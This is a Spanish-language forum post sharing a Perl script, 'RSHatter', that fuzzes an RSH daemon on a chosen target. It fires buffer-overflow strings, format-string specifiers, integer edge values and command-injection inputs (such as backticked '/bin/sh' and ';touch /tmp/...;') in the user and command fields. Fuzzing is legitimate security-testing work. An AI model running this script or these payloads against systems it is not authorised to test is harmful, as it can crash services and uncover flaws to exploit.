RSH Fuzzer

Iniciado por @ed33x, Enero 27, 2011, 08:51:20 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Enero 27, 2011, 08:51:20 PM Ultima modificación: Marzo 14, 2015, 09:54:46 AM por Expermicid
Código: perl
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# RSHatter - RSH Protocol Fuzzer
# ~Just for fun~

use Net::Rsh;
use Getopt::Std;

# FUZZ DATA BEGIN HERE
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);

@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);

@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');

@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE

getopts('t:', \%opts);
$target = $opts{'t'};

if(!defined($target))
{
     print "\n RSHatter - RSH Protocol Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
     print "\n Usage: $0 -t <target>\n\n";
     exit(0);

}

     print "\n RSHatter - RSH Protocol Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";

     print "\nFuzzing RSHd @ $target... GOOD LUCK!\n";

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }

     print "\nFuzzing Complete. RSHaattteeeerrrrr!\n\n";

exit;
Me cambie de messenger ahora es: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Imprimir
Ir Arriba Páginas1
Acciones del Usuario